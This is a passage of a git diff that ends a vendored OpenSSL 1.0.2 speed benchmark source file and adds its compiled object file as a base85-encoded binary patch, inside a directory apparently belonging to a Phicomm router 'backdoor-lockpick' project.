+                fprintf(stdout, " %11.2f ", results[D_EVP][j]);
+        }
+        fprintf(stdout, "\n");
+    }
+
+    OPENSSL_free(inp);
+    OPENSSL_free(out);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/speed.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/speed.o
new file mode 100644
index 0000000000000000000000000000000000000000..d19d4bf04372b2f0e8a1603f3611356c918f160d
GIT binary patch
literal 58552
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
